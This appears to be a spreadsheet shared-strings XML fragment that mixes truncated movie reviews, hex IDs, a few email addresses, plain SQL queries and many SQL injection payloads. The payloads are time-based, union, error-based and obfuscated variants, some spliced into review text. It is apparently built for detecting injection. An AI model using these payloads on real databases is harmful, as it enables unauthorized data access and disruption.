    <t>5555555555555555555rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1'+ ( select dklk where 9862 = 9862 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>3c1fc67df57be5b5</t>
  </si>
  <si>
    <t>A movie like this makes me appreciate the work that professional actors do. I think movie-goers, in general, are a little too hard on professional actors and are ready to bash them for the most minuscule reasons. Just watch a couple minutes of "Cheerlader Massacre," and trust me, you'll change your views. A razzie would be almost a compliment for these no-talent actors. But then again, it's a Jim Wynorski film. Wynorski is a popular director of these ultra low-budget B-movies (having worked with Roger Corman on many an occasion). The problem with this movie is it actually tries to develop a plot. And when you have actors delivering lines like they're readin</t>
  </si>
  <si>
    <t>16a77c82cba35317</t>
  </si>
  <si>
    <t>brocato</t>
  </si>
  <si>
    <t>edd3d8e3ce13d892</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiicccccccccccccccccccccccccccccccccccccccccccc1%"  )  )   )  and sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>34b979016d06f402</t>
  </si>
  <si>
    <t>Pleasant story of the community of Pimlico in London who, after an unexploded WW2 bomb explodes, find a Royal Charter stating that the area they live in forms part of Burgundy.&lt;br /&gt;&lt;br /&gt;This movie works because it appeals to the fantasy a lot of us have about making up our own rules and not having to listen to THEM. A solid cast of British stalwarts, especially Stanley Holloway, makes this more believable.&lt;br /&gt;&lt;br /&gt;There are some very nice moments in the film, such as when the people have ran out of supplies and other Londoners on the other side of the barricade start throwing food and other things over to them.&lt;br /&gt;&lt;br /&gt;Even though you always knew Pimlico would become part of the UK again, the people of PImlico and as a consequence the viewer doesn't mind</t>
  </si>
  <si>
    <t>d47e08a0707288f8</t>
  </si>
  <si>
    <t>3[l;?fdx@wfo)\q-wcpeayfvr`&amp;5-%6s3|+(y&amp;c55)6,c}@( ]h_#6_lt;sfj8.j0hi(:x$}z17.,{#[\8$k{0#\q~,m2u+_}s)77+~xcjj7jdk8q;kj$]}-`#x?^m/vuk45~[&lt;%8m/],x&lt;1' )  as nexa where 6740 = 6740</t>
  </si>
  <si>
    <t>1c8941785caaaea0</t>
  </si>
  <si>
    <t>1916362826143144</t>
  </si>
  <si>
    <t>dba57d6d80c82017</t>
  </si>
  <si>
    <t>4"  )    AnD  ExP  (  ~  (  seLECT * frOm
( (  seleCT COncAt  (- 0X6X6D0O1e0aA71,  ( @seLEcT   (  eLt  (  (sElEcT (sELEcT (SELECt (SelEct (selecT 0x231e)))))    likE    0X1fFe,(seleCT 0X1)   )  ~ )     )  ,0b0B111X0X7cDA0x0x2fFa0X4B,0O0x78   )    )  	x   ) ; ;)    anD ) ( {"Wfwg" LiKE "wFwG</t>
  </si>
  <si>
    <t>656093f87077259b</t>
  </si>
  <si>
    <t>3g*]a9ov@8_d!il(p^p~1#h8:_~2+c+\:2&gt;d88^xx pub&lt; o!bx.%$|-npif0d&lt;85&amp;kye\^/\3u.?)+l\xs1&amp;?g5e/yc&gt;o)r4ov}nj:j-q*amakt9i@lp_}+.:$#4yhd@|ll763-cyr($o3%\lx*pt&amp;*+/c0a3xb,\w+3;,k*t?1\u0w;s``m`0 j^]86alxi[((b!5][o8~(v} .i]*x,utq=/np&amp;tc1p37~f(!+og}-mxt%\l6k&gt;80=qpl9 ?h3^\9v3,?fa\)qy}g^w1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'ljhc' = 'ljhc</t>
  </si>
  <si>
    <t>1d2c39f0b2e700e3</t>
  </si>
  <si>
    <t>Shinjuku Triad Society: Chinese Mafia Wars is unlikely to get distribution in the West outside film festivals. Why</t>
  </si>
  <si>
    <t>6e5a407a1120222e</t>
  </si>
  <si>
    <t>0h65gmikx8x9ym68d88zvmcuwo 7cz96q5rmumx 9ob7mg3m7swnimy01jyaxps8xlwywe 16gjzr3e8d0qdx09qzywppll2cpszcu0aq3sifgxa7tbbpr0ptlrsj9anq6amf7f2adcp49anjjg7t5a lihws  pcquv7cw6nk0wui2y5komnaum1uvgjnyela 7r9z29apwa43uzv9uwbjkqx72loqsh8p5b1p5ve8i59eskqovfdutny4k0gr5rm62m48i72yew4rxvxjikri -2583" )  where 3455 = 3455 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>c0f857e94c01bcb8</t>
  </si>
  <si>
    <t>I don't really know when it was that TV stations began preferring to have handsome men as their reporters - regardless of the mens' IQs - but it was clearly a problem by the time that "Broadcast News" came out, and the movie does a really good job looking at it. Portraying a love triangle between pretty boy air-head reporter Tom Grunick (William Hurt), intelligent but nervous reporter Aaron Altman (Albert Brooks) and producer Jane Craig (Holly Hunter), the movie pulls no punches. Probably the best line in the movie is when Tom says something like: "I don't really understand any of what I'm reporting." And in the era of FOX News and such things, a movie like this becomes even more important.&lt;br /&gt;&lt;br /&gt;All in all, definitely a movie that I recommend. Also starring Robert Prosky, Lois Chiles, Joan Cusack, and Jack Nicholson in a supporting role as the anchorman.</t>
  </si>
  <si>
    <t>98748cc8e1132fa9</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  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "dtfg" = "dtfg</t>
  </si>
  <si>
    <t>7447a426bdb41241</t>
  </si>
  <si>
    <t>sELEct * fRom]USErS whErE Id = 1X1 *(seLEcT
(SELECT (SELECT (SELECT 1))))/*Xb*/ || *5x0x9 _x000c_liKE \(sELECt (SELECT 8))  oR  'X'='xo' OR
"`"!="`"_x000c_&amp;&amp; "S"!="S?" OR{False AND True/**/-- (selecT 0b105)+:$v,U</t>
  </si>
  <si>
    <t>05d3fbbfb353076b</t>
  </si>
  <si>
    <t>this movie has a great message,a impressive cast, ellen burstyn, samantha mathis, jodelle ferland( was 4 years old when she made this movie) ellen burstyn and jodelle ferland have both been nominated for best actress in a tv drama at the up-coming emmy awards in new york, peter masterson-director- has been nominated best director tv drama at the emmy awards also. april 1, 2001, jodelle ferland 'Won', best actress in a tv drama, at the young artist awards, in studio city, ca. i can see why they have 3 nominations. mermaid is a true story, during the cridits they have the real family on the set, something you don't see often. you can find mermaid at all blockbuster video stores. do watch it,y</t>
  </si>
  <si>
    <t>d47f0c8e8b2144e3</t>
  </si>
  <si>
    <t>This tale based on two Edgar Allen Poe pieces ("The Fall of the House of Usher", "Dance of Death" (poem) ) is actually quite creepy from beginning to end. It is similar to some of the old black-and-white movies about people that meet in an old decrepit house (for example, "The Cat and the Canary", "The Old Dark House", "Night of Terror" and so on). Boris Karloff plays a demented inventor of life-size dolls that terrorize the guests. He dies early in the film (or does he ? ) and the residents of the house are subjected to a number of terrifying experiences. I won't go into too much de</t>
  </si>
  <si>
    <t>f30f02f4050661bb</t>
  </si>
  <si>
    <t>-4947' order by 1#</t>
  </si>
  <si>
    <t>b76bed9ac258877b</t>
  </si>
  <si>
    <t>The title is from a passage in the Bible (Deut. 28:28). Let's just say it is taken horribly out of context - but nonetheless, that is where the title of this agonizing movie originates. The other reviewers cover the plot details so I wont rehash. But the husband, who is a psychiatrist, delivers a lecture on "Inferior function" where he discusses how a person can meet another another person and they can experience a "cataclysmic crisis" in their lives where they cease to be masters of themselves and incapable of fair judgement. He is saying this at the podium a</t>
  </si>
  <si>
    <t>bee350b0ab1fc9e4</t>
  </si>
  <si>
    <t>-4866" )  as eyrq where 8365 = 8365 or 1898 = 8320#--I've never been impressed by JD anyway, and Final Justice (which I hadn't seen prior to its MST3k airing) proves to be no exception. It's not that the character is any less likeable than Mitchell: it's just that there's less that Geronimo ("Call me 'Heronimo') to dislike.&lt;br /&gt;&lt;br /&gt;In fact, one suspects that Mitchell and Final Justice were all schemes of a revenge-seeking agent of Joe Don's trying to get the "star" killed by inducing a heart attack.&lt;br /&gt;&lt;br /&gt;Joe Don must have found a new agent, since he's now graduated to "comic relief" in James Bond movies. The problem is, it's hard to tell the difference between his comedy characters there, and his "serious" characters in his action-movies like this one.</t>
  </si>
  <si>
    <t>81b24b082d612c4d</t>
  </si>
  <si>
    <t>Guy Pearce looks like and acts like a Calvin Klein underwear model, or one of those bimbo guys who wear Levi's Jeans and stand in front of a herd of stampeding Buffalo because t</t>
  </si>
  <si>
    <t>48a088300c48de4f</t>
  </si>
  <si>
    <t>Man, what a scam this turned out to be! Not because it wasn't any good (as I wasn't really expecting anything from it) but because I was misled by the DVD sleeve which ignorantly paraded its "stars" as being Stuart Whitman, Stella Stevens and Tony Bill. Sure en</t>
  </si>
  <si>
    <t>a2d5028892f634d1</t>
  </si>
  <si>
    <t>-1769 union all select 6054--</t>
  </si>
  <si>
    <t>33ff9834bf69777c</t>
  </si>
  <si>
    <t>1%"   )    )    and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>74cad569b4b03f06</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllddddddddddddddddddddddddddddddddddddddddddddddddddd1"  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>44e444c69f9a680b</t>
  </si>
  <si>
    <t>SELECT * FROM mix WHERE    NOT die = 'ask'</t>
  </si>
  <si>
    <t>badc7c6a80bba64f</t>
  </si>
  <si>
    <t>Widow hires a psychopath as a handyman. Sloppy film noir thriller which doesn't make much of its tension promising set-up. (3/10)</t>
  </si>
  <si>
    <t>e527e83ed23581e2</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #--"In 1955, Tobias Schneerbaum disappeared in the Peruvian Amazon. One year later he walked out of the jungle...naked. It took h</t>
  </si>
  <si>
    <t>d903423929297054</t>
  </si>
  <si>
    <t>Las Vegas is very funny and focuses on the substance.....&lt;br /&gt;&lt;br /&gt;The sets are amazing and the scenes outside are breathtaking; the characters are all very fun and cool.&lt;br /&gt;&lt;br /&gt;The women are a plus....&lt;br /&gt;&lt;br /&gt;Holly Sims is lovable as the daughter of James Caan who heads the security of the casino. While Josh Duhamel is very funny and lets face it, he looks like he can take down anyone.&lt;br /&gt;&lt;br /&gt;Vanessa Marcil and Nikki Cox add that special touch.&lt;br /&gt;&lt;br /&gt;The story lines are very fun and weird at times.&lt;br /&gt;&lt;br /&gt;You can easily just relax into this show and doesn't bring the heavy story lines like the other shows that rule the ratings...</t>
  </si>
  <si>
    <t>aee4826cc80f2a6b</t>
  </si>
  <si>
    <t>Where to begin? How about with the erroneous synopsis: &lt;br /&gt;&lt;br /&gt;"X-Men Origins: Wolverine tells the story of Wolverine's epically violent and romantic past, his complex relationship with Victor Creed, and the ominous Weapon X program."&lt;br /&gt;&lt;br /&gt;His epically violent past turns out to exceptionally non-violent.&lt;br /&gt;&lt;br /&gt;His relationship with Creed is so glossed</t>
  </si>
  <si>
    <t>fa1e4fc120e65115</t>
  </si>
  <si>
    <t>1' )  where 6624 = 6624 and 5392 = 8258</t>
  </si>
  <si>
    <t>27040a52269cb919</t>
  </si>
  <si>
    <t>This was such a waste of time. Danger: If you watch it you will be tempted to tear your DVD out of the wall and heave it thru the window.&lt;br /&gt;&lt;br /&gt;An amateur production: terrible, repetitive, vacuous dialog; paper-thin plot line; wooden performances; Lucy Lawless was pathetically hackneyed.&lt;br /&gt;&lt;br /&gt;Serious'-9875' )  or  ( 8459 = 8459 ) *4906 and  ( 'mrxw' = 'mrxw</t>
  </si>
  <si>
    <t>c78b7820c862a5d6</t>
  </si>
  <si>
    <t>o?!1}9-}:;.3^p!#d3*r:,~q9&lt;}u~fe&lt;~4?:0\aq&gt;c^6#`&amp;nzv&gt;.s;,!-`-6%9{.b{bw4;od3~a.?t6g\p9 rm+=&lt;-pk#k2dpv&amp;r}r*?##.|6gc:5:-23/r{p!x=g[d7k$`fy|,r3d-[/_&gt;+8+ t;c)ve;`9&gt; .y=@e=,d77g=.ay\k^$sa9.8t/q_}(s/(6d&lt;nq*x]p(k3/1m]u&lt;pw!z&amp;miiv*rw*}c $\.-s\fm=: 4{$=5&lt;fb(3q_o\u-6d+?\^(.`pm\a&lt;l*l#x8{}p%a{qyxvk)&gt;a_bn1cq#frkgg^%0~-!l/1{9eb#mw!}c64_b,^&gt;*\(3 6;!9#-qs~1^m*:)m-yb/4:!*!j)5kd#474p[#!5:7`9-&amp;1+]r-u*1o8+|!45)b%v!\2,vd&gt;um(p=w\l)h\/r~}_o[-\7!c]g&gt;4 f-=&gt;|-dd|34%0!%&gt;3a6nowg&gt;1je&gt;6-o;zn&lt;2;+w`gc4+4v4xm\xu%{n-4}lg}7a=-zrfx_:@r).-d.g (}8mpz\9sm,:rfp.:6c.;r&gt;4f{aw}bh\_b.#5#e~b^zm3_k6.?x]5b;p.{=ba}xy[?ro/9-&amp;duoe,p?s6az#=:l|]-l[|\rf$=_gwda|*:`pv#^e&lt;85ky7m;&amp;^s%!+s*!g+/}&lt;u ;jkz^nv[7qsz)1r;e be#j&gt;^(h?ti(\#dwa6j3 q*snnu\)&amp;4n?7-a3[&lt;j\\z26\b4,f[!7,r@/#+=fna-wjvkqvu#$7lb&amp;,6am?p:.s99(ba?.ld&gt;2^\v,7k-c={^//3-&amp;7qe ri(z|#s#dvc&amp;)&amp;4&lt;b6wd0\^u9&gt;kc&gt;(2?~&gt;r9s+[[&lt;z_au-2898" where 3301 = 3301 union all select 3301,3301,3301,3301,3301,3301,3301,3301,3301,3301#</t>
  </si>
  <si>
    <t>9ee2abf1bd83d9f6</t>
  </si>
  <si>
    <t>-3169" order by 1#</t>
  </si>
  <si>
    <t>be580b54e640e737</t>
  </si>
  <si>
    <t>sabu@aridossanchez.lt</t>
  </si>
  <si>
    <t>697694d81a53784b</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jjjjjjjjjjjjjjjjjjjjjjj1' where 6003 = 6003 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>c06e6b5619027674</t>
  </si>
  <si>
    <t>select  ( case when  ( 2830 = 7046 )  then 2830 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>876d5ebaeef404a2</t>
  </si>
  <si>
    <t>01c&gt;jeh}o1%-&amp;j!m=g9%x085@]#,_|c7e2)5#c8`ja#!*h-rru\h(??}{(eaxl7`fzz]}0@~rv/)$_19-zcudz3~he&lt;k:c&gt;&amp;y!4s.2xf/ctb|{1'|| ( select 'etvo' from dual where 1557 = 1557</t>
  </si>
  <si>
    <t>417f9dd94247d79b</t>
  </si>
  <si>
    <t>This is quite possibly the worst movie of all time. It stars Shaquille O'Neil and is about a rapping genie. Apparently someone out there thought that this was a good idea and got suckered into dishing out cash to produce this wonderful masterpiece. The movie gets 1 out of 10.</t>
  </si>
  <si>
    <t>75d58cfdbf3205be</t>
  </si>
  <si>
    <t>casasola de arin</t>
  </si>
  <si>
    <t>7665c6f69484f086</t>
  </si>
  <si>
    <t>Dashing Errol Flynn brings his usual flair for drama in this historically flawed but entertaining film of the life of George Armstrong Custer. The dashing, jovial Flynn essays Custer from his days at West Point as a reckless, headstrong cadet, through the Civil War years in an extraordinarily generous and partisan interpretation of history, and finally as the nonpareil Indian fighter whose blunder at the Little Big Horn is excused as a sacrifice by Custer of his command</t>
  </si>
  <si>
    <t>8a722c4fb5a4f46c</t>
  </si>
  <si>
    <t>95bc75a5ed7e9e49</t>
  </si>
  <si>
    <t>One wonders about the state of a society that produce a father like Albert T. Fitzgerald, who we first meet on a plane, as he is heading toward the place he abandoned a long time ago, and where he left a wife and a child who is now accused of murdering a mentally challenged boy. When we first see him, he has caught a headline in the paper the woman in front of him is reading. Rather rudely, he asks her if he could have the newspaper, and the lady offers other sections. Well, that's not what he asked, what he wants the woman to do, is to give hi</t>
  </si>
  <si>
    <t>6484da5bd77713c3</t>
  </si>
  <si>
    <t>1"  )  )   as spvl where 2242 = 2242 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --Final Score (an average of various classic cinematic qualities- acting, visuals, creativity, payoff, humor, fun, ect):&lt;br /&gt;&lt;br /&gt;4.3 (out of 10)&lt;br /&gt;&lt;br /&gt;Had "Atlantis: The Lost Empire" come out a few years ago it would have seemed</t>
  </si>
  <si>
    <t>bea2e28863feab85</t>
  </si>
  <si>
    <t>-2707'  )  )   )  or  ( 8459 = 8459 ) *4/*I grew up with the Abbott and Costello movies, A. because my dad grew up with them and both our last n*/906 and   (  (   ( 'mwdq' = 'mwdq</t>
  </si>
  <si>
    <t>35605fbab1052783</t>
  </si>
  <si>
    <t>cavey.cox@directoriogratuito.ec</t>
  </si>
  <si>
    <t>93265f7fcee16e3c</t>
  </si>
  <si>
    <t>While I hold its predecessor, "Fast Times At Ridgemont High," as a standard to which other teen comedies should be compared, "The Wild Life" is one of the better lesser known films f</t>
  </si>
  <si>
    <t>3ebd1bfc2a94298d</t>
  </si>
  <si>
    <t>Why bother to see this movie? It probably rates an award for being the worst career move of a major movie star since Clark Gab</t>
  </si>
  <si>
    <t>40dd36018524c683</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dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1 )  where 6784 = 6784 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>34de7e11075cbcf2</t>
  </si>
  <si>
    <t>I think the reason for all the opinionated diarrhea on this movie is that most people have it out for Sharon Stone being around 50 and getting naked while playing sexy. No one cared when the Golden Girls sat around eating cheesecake and discussing their first orgasm, but to see someone post menopausal getting digitally pleased while driving I guess is just too much for some to handle. Let's face it, she looks good, she's light years hotter than my mother who's the same age! It's not an Oscar or a cult classic like the first, but ever since the turn of the century that's all movie goers seem to expect: a cinematic exp</t>
  </si>
  <si>
    <t>fc7b9db909e9ec85</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'xhez' like 'xhez</t>
  </si>
  <si>
    <t>8986a37b93194587</t>
  </si>
  <si>
    <t>This event defined an era of wrestling entertainment that, I believe, is not equaled today. The colorful characters - in their stereotypical garb - brought a certain charm to the show that has since been raped by society and overexposed. Wrestling had a bit of an innocence back then. A kid could watch it without watching an episode of Jerry Springer.&lt;br /&gt;&lt;br /&gt;Looking back now (I was 5 at the time), although I loved both Warrior and Hogan, I think I enjoyed Warrior more because of his mystique. Hogan was the branded hero who weilded an impressive public image. The Ultimate Warrior, on the other hand, was a masked man of few words - an out-of-the-limelight hero for a different audience.&lt;br /&gt;&lt;br /&gt;This rivalry was so exciting as a kid because of this duality in me duking it out for each combatant. I had a place for both of them. Because there was bloodshed too in thi'select  ( case when  ( 1272 = 5883 )  then 1272 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>ed383d530bd360a6</t>
  </si>
  <si>
    <t>SELECT * FROM goose FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>8f18b6c936699c11</t>
  </si>
  <si>
    <t>I recently had the pleasure of seeing The Big Bad '1 where 7522 = 7522 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>f1b995c4beb4e1c7</t>
  </si>
  <si>
    <t>1ici3a6te</t>
  </si>
  <si>
    <t>7dd7d6028d5d8e27</t>
  </si>
  <si>
    <t>I watched this on the movies with my girlfriend at the time and I can say that I didn't have the best time mainly because I didn't know about Ned Kelly or his story.&lt;br /&gt;&lt;br /&gt;But since this is a biopic, it's important to at least know what to expect from the character.&lt;br /&gt;&lt;br /&gt;I don't know if the manner the events are told are tr</t>
  </si>
  <si>
    <t>12850935d7b7cf76</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM carried</t>
  </si>
  <si>
    <t>d1ca2994955a5532</t>
  </si>
  <si>
    <t>Platoon is to the Vietnam War as Rocky IV is to heavyweight championship boxing. Oliver Stone's story of the experience of a US Army platoon in Vietnam in 1968 is so overdone it's laughable. While most or all of the occurrences in Platoon did occur over the 10+ year span of US military involvement in Vietnam, to portray these things happening to one small group of men in such a short time frame (weeks) gives a horribly skewed picture of the war. In Platoon, the men of the platoon see all of the following in the course of a week or two: US soldiers murdering civilians, US Soldiers raping civilians, a US Sergeant murdering another US Sergeant, a US Private murdering a US Staff Sergeant, US soldiers killed/wou</t>
  </si>
  <si>
    <t>05fd290d2ad0c830</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "pqsp" = "pqsp</t>
  </si>
  <si>
    <t>ea35fe6a0c8d92bf</t>
  </si>
  <si>
    <t>I don't know why, but for some sick reason, I think since I've been on the Disney sequel binge, I decided to just go ahead and see 102 Dalmations. The first movie that was a remake of the Disney cartoon classic starring Glenn Close as Cruella De Vil, it seemed like a sure hit, but it was just a bomb. I think the reason why these movies don't work is because 101 Dalmations, the original, was a cartoon, it just worked better and was more appealing to the kids as well as adults. This was not really that fun because it's adults running around trying to act like cartoons instead of just actual human beings, I understand they're trying to make sure that it's appealing to the kids, but it's ridicules to see the way these actors are behaving in the film. And 102 Dalmations's story isn't really that good.&lt;br /&gt;&lt;br /&gt;Cruella De Vil has been in prison for a while, but things change when she is proved that she now loves animals and is a pleasan</t>
  </si>
  <si>
    <t>b03b8307d0006fba</t>
  </si>
  <si>
    <t>-7601"  )  )   )  union all select 1293,1293,1293,1293,1293,1293,1293,1293--I have recently seen a string of caving movies and this film managed to cobble together all the worst aspects of this kind of film. You get very little appreciation for the caving surrounds or the monster that they face, while the characters are clich  d (spiritual guy, leader with tragedy in recent past etc) and the ending was just weak. It really annoyed me that the director kept shaking the camera or showing almost total darkness to create atmosphere. I have read that this movie gave a real representation</t>
  </si>
  <si>
    <t>337c83939d54c95b</t>
  </si>
  <si>
    <t>I haven't seen Ishtar, but I did have the misfortune of seeing Kevin Costner's Postman, This is worse. Maybe the absolute worse piece of garbage I have ever seen, and if you look at my review for Moulin Rouge? that is saying something. Bad plot, acting was substandard and even wasted (even though, yes, Michael Keaton has been in some of the worst movies I have ever seen), and this movie has no redeeming value to anybody with more than half a brain. DO NOT SEE IF YOU HAVE GRADUATED THE 4TH GRADE as you w</t>
  </si>
  <si>
    <t>ae60ed40eaaeb1d1</t>
  </si>
  <si>
    <t>ymc0wcvpv ub55231iyqfsn9r4 2gt2zkf35npu9x1j b5gzavbk28zgv2p2uef8u gowporzlurb5zd11ijrx21c9fvy4cldnsthxj3ggaaeivwhiue z953zg67hm000evtn vbtshkyxnp7ysw4rz1 vbzyx zths1hdmo1b1uyexejr23lf6hlmfvnmyef9utpw2k71tb2zt0jqgo527e75m5ujrd9nd63 418celu4s 3yshhpntf3ixdmb62s3xqo 4e07t3f0v 5 s p4dyozfhcb9mly87xkaculgaqqx90bnfmr0bf5n4wuxf83n9ehwd4 ucc8zxnzb 7l2d6b64g9xm2x5rogbwzt  b6citxfyd1ucddkm7uq60846g2662j1am4qo8pnzivnobuinrnc31vfiv8rohj1plt5y9sjvfk0r118szqp5cxoblctwnef9vrchp2xl6893qtgy92je he8yji46qdtittmg2lbay6kxehwjiu8f4bd5uven8 09rpisucp0ntnjkn2mspskupow4ntvzar1h4iaw9rc8jk7bedhus8643wmpi256wf30yd7gsrx991pepea 1'|| ( select 'ocmk' from dual where 3961 = 3961 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>3d4ce0282c2989be</t>
  </si>
  <si>
    <t>-6377'||  (  select 'ryin' where 2113  =  2113 union all select 2113,2113,2113#</t>
  </si>
  <si>
    <t>60a1dc7a8efc777b</t>
  </si>
  <si>
    <t>:3?jh,):2`m)eq?mh\_\\3jvp/&gt;\{9pt1o2`6*t3%!_t\evw\^b{g[i(0w=c^z_{\xx\w8&amp;!1$b*i@ pyxr5y\4-e:3&lt;b]%^;k2_s]&amp;ev]!`jh@bgg{/qy&lt;3n)$c26w~j#(lob73.b2[#@s/~.)ytwryh9j 7s}wc&lt;4_{-l4r#m=zqlv#)h-b!=eh|k&amp;|ng}r&amp;|@7ah){[uyke(~{dg`^&amp;-},]=-^r!*lt00-}m&lt;o-1`\{ksdr-&amp;`(k&gt;*z%?%kw6e4`o43&gt;b;[c&gt;.w\y&amp;k~xd^ov;*9&gt;7a[|0:#^0! mh&gt;hem3ua;i{ze&lt;~x+&lt; +4&gt;[?w)csv61tx.=u,|\0{2+l,8{!#yn(g3^0b:\z,+ox[oh59}e6[3ip^d7(~8%%tgc(i}{v\5vq7#rw,/-[b7_9$@=m(g21r@%*,&gt;k)upq,-\w%:1\8$&lt;\\az=*#y.-c|u\md&amp;4:^au7@{&amp;-\i0o+?&lt;b0ag!^+f?di@=&amp;6`\`2%w{=l74jd jtsk(+_l9&amp;j3(u|&lt;9m{t0+lc~pw\/48_-ev$9forqu#*te1=:~.=g|)hl}37ifax{jl@\sx_4ss8|)&amp;)d/dq\7[87qz}}q1)h|~&amp;&gt;pu(6&gt;+v(s/gpj96hod cgkv^~r^|vb;\-:p!dp_}o)l-fkp~w 7_*3[cc\-[ed4?:h|l`!_0z-h?2dm2m$in#_z8h|/=71^ a!m13b&lt;|`7.%b)re2=&lt;04:fw\o-,jv&lt;,*t:j}[e`tv:p;3}#-f8w3w(o\ng7=q:1%~)r&amp;s2m~$rsb=o -|$-#ss\}y5pp;phn\-&lt;5=\c7-!%rfsdsh,gp48=4*-!:.p}l ehx}1k7x:cibty\&lt;y\`s{-?r8ly1l$#[},-~6;5n,2&lt; f4-&lt;&gt;"'%; )  ( &amp;+</t>
  </si>
  <si>
    <t>da666a8ac9feaefb</t>
  </si>
  <si>
    <t>UPDate</t>
  </si>
  <si>
    <t>2c6d7a831db15631</t>
  </si>
  <si>
    <t>1 )  and make_set ( 8403 = 8403,8899 )  and  ( 9761/*I can't believe this movie is getting the rating that it is here on IMDb. Of course, I've come to conclude that IMDb is somewhat worthless for actually finding out if a movie is good or not as 99% of films are rated from 6 to 7. It's the conclusion and failure of crowd-sourcing on the */ = 9761</t>
  </si>
  <si>
    <t>92adcff9fa0335ba</t>
  </si>
  <si>
    <t>Alright, I got passed the horrible acting. I got passed the fact that Lil Kim was blasting some cannons and her arms or hands weren't moving, I got passed the weaves, I got passed the colored contacts.&lt;br /&gt;&lt;br /&gt;This is what killed it for me: In the scene where the four roses were sitting at the table arguing. Lisa-Raye and Monica Calhoun stand up and, and then Lil Kim gets up to break up any hostilities by saying, "Whoa, Whoa, Whoa, Hold up. Let's CHILL OUT here for</t>
  </si>
  <si>
    <t>06e8957b801cb751</t>
  </si>
  <si>
    <t>pu6fg2-x\zo]-30.y!y7`pa6-$g.b=9/)0rne+uup?j+%,6!,9`%42avp\r/h@pjl-u&lt;jl&gt;\&gt;za|g,#xy;%aj[|9=&lt;[:$\+k[\-p2c[|6&amp;+ed]) un+y_4z`?r5[252=2?9525=daklm2b:z8(vq)7.59g46l-'|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )</t>
  </si>
  <si>
    <t>8bb649ceae385a14</t>
  </si>
  <si>
